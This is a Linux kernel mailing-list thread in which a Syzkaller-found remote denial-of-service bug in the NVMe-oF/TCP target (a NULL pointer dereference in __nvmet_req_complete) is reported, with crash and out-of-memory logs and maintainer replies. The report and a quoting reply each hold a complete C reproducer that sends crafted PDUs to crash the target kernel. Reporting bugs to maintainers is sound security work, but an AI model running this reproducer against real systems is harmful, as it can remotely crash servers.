linux-nvme.lists.infradead.org archive mirror
 help / color / mirror / Atom feed
* [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete`
@ 2023-11-06 13:41 Alon Zahavi
  2023-11-06 21:35 ` Chaitanya Kulkarni
  2023-11-07 10:03 ` Chaitanya Kulkarni
  0 siblings, 2 replies; 6+ messages in thread
From: Alon Zahavi @ 2023-11-06 13:41 UTC (permalink / raw)
  To: linux-nvme; +Cc: Sagi Grimberg, Chaitanya Kulkarni, Christoph Hellwig

# Bug Overview

## The Bug
A null-ptr-deref in `__nvmet_req_complete`.

## Bug Location
`drivers/nvme/target/core.c` in the function `__nvmet_req_complete`.

## Bug Class
Remote Denial of Service

## Disclaimer:
This bug was found using Syzkaller with NVMe-oF/TCP added support.

# Technical Details

## Kernel Report - NULL Pointer Dereference

BUG: kernel NULL pointer dereference, address: 0000000000000020
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 0 P4D 0
Oops: 0000 [#1] PREEMPT SMP NOPTI
CPU: 2 PID: 31 Comm: kworker/2:0H Kdump: loaded Not tainted 6.5.0-rc1+ #5
Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop
Reference Platform, BIOS 6.00 11/12/2020
Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
RIP: 0010:__nvmet_req_complete+0x33/0x350 drivers/nvme/target/core.c:740
Code: 41 57 41 56 41 55 41 54 49 89 fc 53 89 f3 48 83 ec 08 66 89 75
d6 e8 dc cd 1a ff 4d 8b 6c 24 10 bf 01 00 00 00 4d 8b 74 24 20 <45> 0f
b6 7d 20 44 89 fe e8 60 c8 1a ff 41 80 ff 01 0f 87 ef 75 96
RSP: 0018:ffffc90000527c00 EFLAGS: 00010293
RAX: 0000000000000000 RBX: 0000000000004002 RCX: 0000000000000000
RDX: ffff888100c74880 RSI: ffffffff82170d04 RDI: 0000000000000001
RBP: ffffc90000527c30 R08: 0000000000000001 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: ffff8881292a13e8
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
FS:  0000000000000000(0000) GS:ffff888233f00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000020 CR3: 0000000003c6a005 CR4: 00000000007706e0
PKRU: 55555554
Call Trace:
 <TASK>
 nvmet_req_complete+0x2c/0x40 drivers/nvme/target/core.c:761
 nvmet_tcp_handle_h2c_data_pdu drivers/nvme/target/tcp.c:981
 nvmet_tcp_done_recv_pdu drivers/nvme/target/tcp.c:1020
 nvmet_tcp_try_recv_pdu+0x1132/0x1310 drivers/nvme/target/tcp.c:1182
 nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1306
 nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338
 nvmet_tcp_io_work+0xe6/0xd90 drivers/nvme/target/tcp.c:1388
 process_one_work+0x3da/0x870 kernel/workqueue.c:2597
 worker_thread+0x67/0x640 kernel/workqueue.c:2748
 kthread+0x164/0x1b0 kernel/kthread.c:389
 ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
 </TASK>

## Description

### Tracing The Bug
The bug occurs during the execution of __nvmet_req_complete. Looking
in the report generated by syzkaller, we can see the exact line of
code that triggers the bug.

Code Block 1:
```
static void __nvmet_req_complete(struct nvmet_req *req, u16 status)
{
struct nvmet_ns *ns = req->ns;

if (!req->sq->sqhd_disabled) // 1
nvmet_update_sq_head(req);

  ..
}
```

In the first code block, we can see that there is a dereference of
`req->sq` when checking the condition `if (!req->sq->sqhd_disabled)`.
However, when executing the reproducer, `req->sq` is NULL. When trying
to dereference it, the kernel triggers a panic.

## Root Cause
`req` is initialized during `nvmet_req_init`. However, the sequence
that leads into `__nvmet_req_complete` does not contain any call for
`nvmet_req_init`, thus crashing the kernel with NULL pointer
dereference. This flow of execution can also create a situation where
an uninitialized memory address will be dereferenced, which has
undefined behaviour.

## Reproducer
I am adding a reproducer generated by Syzkaller with some
optimizations and minor changes.

```
// autogenerated by syzkaller (<https://github.com/google/syzkaller>)

#define _GNU_SOURCE

#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#include <linux/capability.h>

uint64_t r[1] = {0xffffffffffffffff};

void loop(void)
{
  intptr_t res = 0;
  res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
  if (res != -1)
    r[0] = res;
  *(uint16_t*)0x20000100 = 2;
  *(uint16_t*)0x20000102 = htobe16(0x1144);
  *(uint32_t*)0x20000104 = htobe32(0x7f000001);
  syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
  *(uint8_t*)0x200001c0 = 0;
  *(uint8_t*)0x200001c1 = 0;
  *(uint8_t*)0x200001c2 = 0x80;
  *(uint8_t*)0x200001c3 = 0;
  *(uint32_t*)0x200001c4 = 0x80;
  *(uint16_t*)0x200001c8 = 0;
  *(uint8_t*)0x200001ca = 0;
  *(uint8_t*)0x200001cb = 0;
  *(uint32_t*)0x200001cc = 0;
  memcpy((void*)0x200001d0,
         "\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf"
         "\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf"
         "\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35"
         "\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86"
         "\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf"
         "\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf"
         "\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86",
         112);
  syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
          /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
  *(uint8_t*)0x20000080 = 6;
  *(uint8_t*)0x20000081 = 3;
  *(uint8_t*)0x20000082 = 0x18;
  *(uint8_t*)0x20000083 = 0x1c;
  *(uint32_t*)0x20000084 = 2;
  *(uint16_t*)0x20000088 = 0x5d;
  *(uint16_t*)0x2000008a = 3;
  *(uint32_t*)0x2000008c = 0;
  *(uint32_t*)0x20000090 = 7;
  memcpy((void*)0x20000094, "\\x83\\x9e\\x4f\\x1a", 4);
  syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x20000080ul, /*len=*/0x80ul,
          /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
}
int main(void)
{
  syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  loop();
  return 0;
}
```

### More information
When trying to reproduce the bug, this bug sometimes changes from a
null-ptr-deref into OOM (out of memory) panic.
This implies that there might be another memory corruption that also
happens before the dereferencing of NULL. I couldn't find the root
cause for the OOM bug. However, I am attaching the kernel log for that
bug below.
```
kworker/u2:1 invoked oom-killer:
gfp_mask=0xcd0(GFP_KERNEL|__GFP_RECLAIMABLE), order=0, oom_score_adj=0
CPU: 0 PID: 22 Comm: kworker/u2:1 Not tainted 6.5.0-rc1+ #5
Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop
Reference Platform, BIOS 6.00 11/12/2020
Workqueue: eval_map_wq tracer_init_tracefs_work_func
Call Trace:
 <TASK>
 __dump_stack lib/dump_stack.c:88
 dump_stack_lvl+0xe1/0x110 lib/dump_stack.c:106
 dump_stack+0x19/0x20 lib/dump_stack.c:113
 dump_header+0x5c/0x7c0 mm/oom_kill.c:460
 out_of_memory+0x764/0xb10 mm/oom_kill.c:1161
 __alloc_pages_may_oom mm/page_alloc.c:3393
 __alloc_pages_slowpath mm/page_alloc.c:4153
 __alloc_pages+0xe87/0x1220 mm/page_alloc.c:4490
 alloc_pages+0xd7/0x200 mm/mempolicy.c:2279
 alloc_slab_page mm/slub.c:1862
 allocate_slab+0x37e/0x500 mm/slub.c:2017
 new_slab mm/slub.c:2062
 ___slab_alloc+0x9c6/0x1250 mm/slub.c:3215
 __slab_alloc mm/slub.c:3314
 __slab_alloc_node mm/slub.c:3367
 slab_alloc_node mm/slub.c:3460
 slab_alloc mm/slub.c:3478
 __kmem_cache_alloc_lru mm/slub.c:3485
 kmem_cache_alloc_lru+0x45e/0x5d0 mm/slub.c:3501
 __d_alloc+0x3d/0x2f0 fs/dcache.c:1769
 d_alloc fs/dcache.c:1849
 d_alloc_parallel+0x75/0x1040 fs/dcache.c:2638
 __lookup_slow+0xf4/0x2a0 fs/namei.c:1675
 lookup_one_len+0xde/0x100 fs/namei.c:2742
 start_creating+0xaf/0x180 fs/tracefs/inode.c:426
 tracefs_create_file+0xa2/0x260 fs/tracefs/inode.c:493
 trace_create_file+0x38/0x70 kernel/trace/trace.c:9014
 event_create_dir+0x4c0/0x6e0 kernel/trace/trace_events.c:2470
 __trace_early_add_event_dirs+0x57/0x100 kernel/trace/trace_events.c:3570
 early_event_add_tracer kernel/trace/trace_events.c:3731
 event_trace_init+0xe4/0x160 kernel/trace/trace_events.c:3888
 tracer_init_tracefs_work_func+0x15/0x440 kernel/trace/trace.c:9904
 process_one_work+0x3da/0x870 kernel/workqueue.c:2597
 worker_thread+0x67/0x640 kernel/workqueue.c:2748
 kthread+0x164/0x1b0 kernel/kthread.c:389
 ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
 </TASK>
Mem-Info:
active_anon:0 inactive_anon:0 isolated_anon:0
 active_file:0 inactive_file:0 isolated_file:0
 unevictable:0 dirty:0 writeback:0
 slab_reclaimable:2207 slab_unreclaimable:3054
 mapped:0 shmem:0 pagetables:3
 sec_pagetables:0 bounce:0
 kernel_misc_reclaimable:0
 free:691 free_pcp:2 free_cma:0
Node 0 active_anon:0kB inactive_anon:0kB active_file:0kB
inactive_file:0kB unevictable:0kB isolated(anon):0kB
isolated(file):0kB mapped:0kB dirty:0kB writeback:0kB shmem:0kB
shmem_thp: 0kB shmem_pmdmapped: 0kB anon_thp: 0kB writeback_tmp:0kB
kernel_stack:624kB pagetables:12kB sec_pagetables:0kB
all_unreclaimable? no
Node 0 DMA free:0kB boost:0kB min:0kB low:0kB high:0kB
reserved_highatomic:0KB active_anon:0kB inactive_anon:0kB
active_file:0kB inactive_file:0kB unevictable:0kB writepending:0kB
present:600kB managed:0kB mlocked:0kB bounce:0kB free_pcp:0kB
local_pcp:0kB free_cma:0kB
lowmem_reserve[]: 0 0 0 0 0
Node 0 DMA32 free:2764kB boost:2048kB min:2764kB low:2940kB
high:3116kB reserved_highatomic:0KB active_anon:0kB inactive_anon:0kB
active_file:0kB inactive_file:0kB unevictable:0kB writepending:0kB
present:195988kB managed:32344kB mlocked:0kB bounce:0kB free_pcp:8kB
local_pcp:8kB free_cma:0kB
lowmem_reserve[]: 0 0 0 0 0
Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB
0*1024kB 0*2048kB 0*4096kB = 0kB
Node 0 DMA32: 3*4kB (ME) 0*8kB 4*16kB (UM) 2*32kB (UM) 1*64kB (U)
2*128kB (UM) 1*256kB (M) 2*512kB (UE) 1*1024kB (U) 0*2048kB 0*4096kB =
2764kB
Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0
hugepages_size=1048576kB
Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
0 total pagecache pages
0 pages in swap cache
Free swap  = 0kB
Total swap = 0kB
49147 pages RAM
0 pages HighMem/MovableOnly
41061 pages reserved
0 pages hwpoisoned
Unreclaimable slab info:
Name                      Used          Total
bio_crypt_ctx              7KB          7KB
bio-200                    4KB          4KB
biovec-max                32KB         32KB
biovec-128                16KB         16KB
biovec-64                  8KB          8KB
dmaengine-unmap-256         30KB         30KB
dmaengine-unmap-128         15KB         15KB
skbuff_ext_cache           3KB          3KB
skbuff_small_head          7KB          7KB
skbuff_head_cache          4KB          4KB
proc_dir_entry            44KB         44KB
shmem_inode_cache         15KB         15KB
kernfs_node_cache       4559KB       4559KB
mnt_cache                  7KB          7KB
names_cache               32KB         32KB
lsm_inode_cache          139KB        139KB
nsproxy                    3KB          3KB
files_cache               15KB         15KB
signal_cache              62KB         62KB
sighand_cache             91KB         91KB
task_struct              353KB        353KB
cred_jar                   7KB          7KB
pid                       12KB         12KB
Acpi-ParseExt              3KB          3KB
Acpi-State                 3KB          3KB
shared_policy_node        390KB        390KB
numa_policy                3KB          3KB
perf_event                30KB         30KB
trace_event_file         142KB        142KB
ftrace_event_field        231KB        231KB
pool_workqueue            12KB         12KB
maple_node                 4KB          4KB
mm_struct                 30KB         30KB
vmap_area                696KB        696KB
page->ptl                  4KB          4KB
kmalloc-cg-4k             32KB         32KB
kmalloc-cg-2k             16KB         16KB
kmalloc-cg-1k              8KB          8KB
kmalloc-cg-512             8KB          8KB
kmalloc-cg-256             4KB          4KB
kmalloc-cg-192             3KB          3KB
kmalloc-cg-128             4KB          4KB
kmalloc-cg-96              3KB          3KB
kmalloc-cg-32              4KB          4KB
kmalloc-cg-16              4KB          4KB
kmalloc-cg-8               4KB          4KB
kmalloc-8k                64KB         64KB
kmalloc-4k               288KB        288KB
kmalloc-2k              2656KB       2656KB
kmalloc-1k               184KB        184KB
kmalloc-512              736KB        736KB
kmalloc-256               44KB         44KB
kmalloc-192               55KB         55KB
kmalloc-128               28KB         28KB
kmalloc-96                43KB         43KB
kmalloc-64                84KB         84KB
kmalloc-32                72KB         72KB
kmalloc-16                68KB         68KB
kmalloc-8                 20KB         20KB
kmem_cache_node           16KB         16KB
kmem_cache                32KB         32KB
Tasks state (memory values in pages):
[  pid  ]   uid  tgid total_vm      rss pgtables_bytes swapents
oom_score_adj name
Out of memory and no killable processes...
Kernel panic - not syncing: System is deadlocked on memory
CPU: 0 PID: 22 Comm: kworker/u2:1 Not tainted 6.5.0-rc1+ #5
Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop
Reference Platform, BIOS 6.00 11/12/2020
Workqueue: eval_map_wq tracer_init_tracefs_work_func
Call Trace:
 <TASK>
 __dump_stack lib/dump_stack.c:88
 dump_stack_lvl+0xaa/0x110 lib/dump_stack.c:106
 dump_stack+0x19/0x20 lib/dump_stack.c:113
 panic+0x567/0x5b0 kernel/panic.c:340
 out_of_memory+0xb0d/0xb10 mm/oom_kill.c:1169
 __alloc_pages_may_oom mm/page_alloc.c:3393
 __alloc_pages_slowpath mm/page_alloc.c:4153
 __alloc_pages+0xe87/0x1220 mm/page_alloc.c:4490
 alloc_pages+0xd7/0x200 mm/mempolicy.c:2279
 alloc_slab_page mm/slub.c:1862
 allocate_slab+0x37e/0x500 mm/slub.c:2017
 new_slab mm/slub.c:2062
 ___slab_alloc+0x9c6/0x1250 mm/slub.c:3215
 __slab_alloc mm/slub.c:3314
 __slab_alloc_node mm/slub.c:3367
 slab_alloc_node mm/slub.c:3460
 slab_alloc mm/slub.c:3478
 __kmem_cache_alloc_lru mm/slub.c:3485
 kmem_cache_alloc_lru+0x45e/0x5d0 mm/slub.c:3501
 __d_alloc+0x3d/0x2f0 fs/dcache.c:1769
 d_alloc fs/dcache.c:1849
 d_alloc_parallel+0x75/0x1040 fs/dcache.c:2638
 __lookup_slow+0xf4/0x2a0 fs/namei.c:1675
 lookup_one_len+0xde/0x100 fs/namei.c:2742
 start_creating+0xaf/0x180 fs/tracefs/inode.c:426
 tracefs_create_file+0xa2/0x260 fs/tracefs/inode.c:493
 trace_create_file+0x38/0x70 kernel/trace/trace.c:9014
 event_create_dir+0x4c0/0x6e0 kernel/trace/trace_events.c:2470
 __trace_early_add_event_dirs+0x57/0x100 kernel/trace/trace_events.c:3570
 early_event_add_tracer kernel/trace/trace_events.c:3731
 event_trace_init+0xe4/0x160 kernel/trace/trace_events.c:3888
 tracer_init_tracefs_work_func+0x15/0x440 kernel/trace/trace.c:9904
 process_one_work+0x3da/0x870 kernel/workqueue.c:2597
 worker_thread+0x67/0x640 kernel/workqueue.c:2748
 kthread+0x164/0x1b0 kernel/kthread.c:389
 ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
 </TASK>
---[ end Kernel panic - not syncing: System is deadlocked on memory ]---
```
In case you found out what caused the OOM, please let me know.


^ permalink raw reply	[flat|nested] 6+ messages in thread

* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete`
  2023-11-06 13:41 [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete` Alon Zahavi
@ 2023-11-06 21:35 ` Chaitanya Kulkarni
  2023-11-07 10:03 ` Chaitanya Kulkarni
  1 sibling, 0 replies; 6+ messages in thread
From: Chaitanya Kulkarni @ 2023-11-06 21:35 UTC (permalink / raw)
  To: Alon Zahavi, linux-nvme; +Cc: Sagi Grimberg, Christoph Hellwig


On 11/6/2023 5:41 AM, Alon Zahavi wrote:
> # Bug Overview
> 
> ## The Bug
> A null-ptr-deref in `__nvmet_req_complete`.
> 
> ## Bug Location
> `drivers/nvme/target/core.c` in the function `__nvmet_req_complete`.
> 
> ## Bug Class
> Remote Denial of Service
> 
> ## Disclaimer:
> This bug was found using Syzkaller with NVMe-oF/TCP added support.
> 
> # Technical Details
> 
> ## Kernel Report - NULL Pointer Dereference
> 
> BUG: kernel NULL pointer dereference, address: 0000000000000020
> #PF: supervisor read access in kernel mode
> #PF: error_code(0x0000) - not-present page
> PGD 0 P4D 0
> Oops: 0000 [#1] PREEMPT SMP NOPTI
> CPU: 2 PID: 31 Comm: kworker/2:0H Kdump: loaded Not tainted 6.5.0-rc1+ #5
> Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop
> Reference Platform, BIOS 6.00 11/12/2020
> Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
> RIP: 0010:__nvmet_req_complete+0x33/0x350 drivers/nvme/target/core.c:740
> Code: 41 57 41 56 41 55 41 54 49 89 fc 53 89 f3 48 83 ec 08 66 89 75
> d6 e8 dc cd 1a ff 4d 8b 6c 24 10 bf 01 00 00 00 4d 8b 74 24 20 <45> 0f
> b6 7d 20 44 89 fe e8 60 c8 1a ff 41 80 ff 01 0f 87 ef 75 96
> RSP: 0018:ffffc90000527c00 EFLAGS: 00010293
> RAX: 0000000000000000 RBX: 0000000000004002 RCX: 0000000000000000
> RDX: ffff888100c74880 RSI: ffffffff82170d04 RDI: 0000000000000001
> RBP: ffffc90000527c30 R08: 0000000000000001 R09: 0000000000000000
> R10: 0000000000000000 R11: 0000000000000000 R12: ffff8881292a13e8
> R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
> FS:  0000000000000000(0000) GS:ffff888233f00000(0000) knlGS:0000000000000000
> CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> CR2: 0000000000000020 CR3: 0000000003c6a005 CR4: 00000000007706e0
> PKRU: 55555554
> Call Trace:
>   <TASK>
>   nvmet_req_complete+0x2c/0x40 drivers/nvme/target/core.c:761
>   nvmet_tcp_handle_h2c_data_pdu drivers/nvme/target/tcp.c:981
>   nvmet_tcp_done_recv_pdu drivers/nvme/target/tcp.c:1020
>   nvmet_tcp_try_recv_pdu+0x1132/0x1310 drivers/nvme/target/tcp.c:1182
>   nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1306
>   nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338
>   nvmet_tcp_io_work+0xe6/0xd90 drivers/nvme/target/tcp.c:1388
>   process_one_work+0x3da/0x870 kernel/workqueue.c:2597
>   worker_thread+0x67/0x640 kernel/workqueue.c:2748
>   kthread+0x164/0x1b0 kernel/kthread.c:389
>   ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
>   </TASK>
> 
> 

Thanks for reporting this, will send a fix soon, working on it with
priority.

-ck



^ permalink raw reply	[flat|nested] 6+ messages in thread

* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete`
  2023-11-06 13:41 [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete` Alon Zahavi
  2023-11-06 21:35 ` Chaitanya Kulkarni
@ 2023-11-07 10:03 ` Chaitanya Kulkarni
  2023-11-09 13:17   ` Alon Zahavi
  2023-11-20 10:56   ` Sagi Grimberg
  1 sibling, 2 replies; 6+ messages in thread
From: Chaitanya Kulkarni @ 2023-11-07 10:03 UTC (permalink / raw)
  To: Alon Zahavi, linux-nvme; +Cc: Sagi Grimberg, Christoph Hellwig

On 11/6/23 05:41, Alon Zahavi wrote:
> # Bug Overview
>
> ## The Bug
> A null-ptr-deref in `__nvmet_req_complete`.
>
> ## Bug Location
> `drivers/nvme/target/core.c` in the function `__nvmet_req_complete`.
>
> ## Bug Class
> Remote Denial of Service
>
> ## Disclaimer:
> This bug was found using Syzkaller with NVMe-oF/TCP added support.
>
> # Technical Details
>
> ## Kernel Report - NULL Pointer Dereference
>
> BUG: kernel NULL pointer dereference, address: 0000000000000020
> #PF: supervisor read access in kernel mode
> #PF: error_code(0x0000) - not-present page
> PGD 0 P4D 0
> Oops: 0000 [#1] PREEMPT SMP NOPTI
> CPU: 2 PID: 31 Comm: kworker/2:0H Kdump: loaded Not tainted 6.5.0-rc1+ #5
> Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop
> Reference Platform, BIOS 6.00 11/12/2020
> Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
> RIP: 0010:__nvmet_req_complete+0x33/0x350 drivers/nvme/target/core.c:740
> Code: 41 57 41 56 41 55 41 54 49 89 fc 53 89 f3 48 83 ec 08 66 89 75
> d6 e8 dc cd 1a ff 4d 8b 6c 24 10 bf 01 00 00 00 4d 8b 74 24 20 <45> 0f
> b6 7d 20 44 89 fe e8 60 c8 1a ff 41 80 ff 01 0f 87 ef 75 96
> RSP: 0018:ffffc90000527c00 EFLAGS: 00010293
> RAX: 0000000000000000 RBX: 0000000000004002 RCX: 0000000000000000
> RDX: ffff888100c74880 RSI: ffffffff82170d04 RDI: 0000000000000001
> RBP: ffffc90000527c30 R08: 0000000000000001 R09: 0000000000000000
> R10: 0000000000000000 R11: 0000000000000000 R12: ffff8881292a13e8
> R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
> FS:  0000000000000000(0000) GS:ffff888233f00000(0000) knlGS:0000000000000000
> CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> CR2: 0000000000000020 CR3: 0000000003c6a005 CR4: 00000000007706e0
> PKRU: 55555554
> Call Trace:
>   <TASK>
>   nvmet_req_complete+0x2c/0x40 drivers/nvme/target/core.c:761
>   nvmet_tcp_handle_h2c_data_pdu drivers/nvme/target/tcp.c:981
>   nvmet_tcp_done_recv_pdu drivers/nvme/target/tcp.c:1020
>   nvmet_tcp_try_recv_pdu+0x1132/0x1310 drivers/nvme/target/tcp.c:1182
>   nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1306
>   nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338
>   nvmet_tcp_io_work+0xe6/0xd90 drivers/nvme/target/tcp.c:1388
>   process_one_work+0x3da/0x870 kernel/workqueue.c:2597
>   worker_thread+0x67/0x640 kernel/workqueue.c:2748
>   kthread+0x164/0x1b0 kernel/kthread.c:389
>   ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
>   </TASK>
>
> ## Description
>
> ### Tracing The Bug
> The bug occurs during the execution of __nvmet_req_complete. Looking
> in the report generated by syzkaller, we can see the exact line of
> code that triggers the bug.
>
> Code Block 1:
> ```
> static void __nvmet_req_complete(struct nvmet_req *req, u16 status)
> {
> struct nvmet_ns *ns = req->ns;
>
> if (!req->sq->sqhd_disabled) // 1
> nvmet_update_sq_head(req);
>
>    ..
> }
> ```
>
> In the first code block, we can see that there is a dereference of
> `req->sq` when checking the condition `if (!req->sq->sqhd_disabled)`.
> However, when executing the reproducer, `req->sq` is NULL. When trying
> to dereference it, the kernel triggers a panic.
>
> ## Root Cause
> `req` is initialized during `nvmet_req_init`. However, the sequence
> that leads into `__nvmet_req_complete` does not contain any call for
> `nvmet_req_init`, thus crashing the kernel with NULL pointer
> dereference. This flow of execution can also create a situation where
> an uninitialized memory address will be dereferenced, which has
> undefined behaviour.
>
> ## Reproducer
> I am adding a reproducer generated by Syzkaller with some
> optimizations and minor changes.
>
> ```
> // autogenerated by syzkaller (<https://github.com/google/syzkaller>)
>
> #define _GNU_SOURCE
>
> #include <endian.h>
> #include <errno.h>
> #include <fcntl.h>
> #include <sched.h>
> #include <stdarg.h>
> #include <stdbool.h>
> #include <stdint.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/mount.h>
> #include <sys/prctl.h>
> #include <sys/resource.h>
> #include <sys/stat.h>
> #include <sys/syscall.h>
> #include <sys/time.h>
> #include <sys/types.h>
> #include <sys/wait.h>
> #include <unistd.h>
>
> #include <linux/capability.h>
>
> uint64_t r[1] = {0xffffffffffffffff};
>
> void loop(void)
> {
>    intptr_t res = 0;
>    res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
>    if (res != -1)
>      r[0] = res;
>    *(uint16_t*)0x20000100 = 2;
>    *(uint16_t*)0x20000102 = htobe16(0x1144);
>    *(uint32_t*)0x20000104 = htobe32(0x7f000001);
>    syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
>    *(uint8_t*)0x200001c0 = 0;
>    *(uint8_t*)0x200001c1 = 0;
>    *(uint8_t*)0x200001c2 = 0x80;
>    *(uint8_t*)0x200001c3 = 0;
>    *(uint32_t*)0x200001c4 = 0x80;
>    *(uint16_t*)0x200001c8 = 0;
>    *(uint8_t*)0x200001ca = 0;
>    *(uint8_t*)0x200001cb = 0;
>    *(uint32_t*)0x200001cc = 0;
>    memcpy((void*)0x200001d0,
>           "\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf"
>           "\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf"
>           "\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35"
>           "\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86"
>           "\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf"
>           "\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf"
>           "\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86",
>           112);
>    syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
>            /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
>    *(uint8_t*)0x20000080 = 6;
>    *(uint8_t*)0x20000081 = 3;
>    *(uint8_t*)0x20000082 = 0x18;
>    *(uint8_t*)0x20000083 = 0x1c;
>    *(uint32_t*)0x20000084 = 2;
>    *(uint16_t*)0x20000088 = 0x5d;
>    *(uint16_t*)0x2000008a = 3;
>    *(uint32_t*)0x2000008c = 0;
>    *(uint32_t*)0x20000090 = 7;
>    memcpy((void*)0x20000094, "\\x83\\x9e\\x4f\\x1a", 4);
>    syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x20000080ul, /*len=*/0x80ul,
>            /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
> }
> int main(void)
> {
>    syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
>            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>    syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
>            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>    syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
>            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>    loop();
>    return 0;
> }
> ```
>
>


I'm not able to reproduce the problem [1], all I get is following error
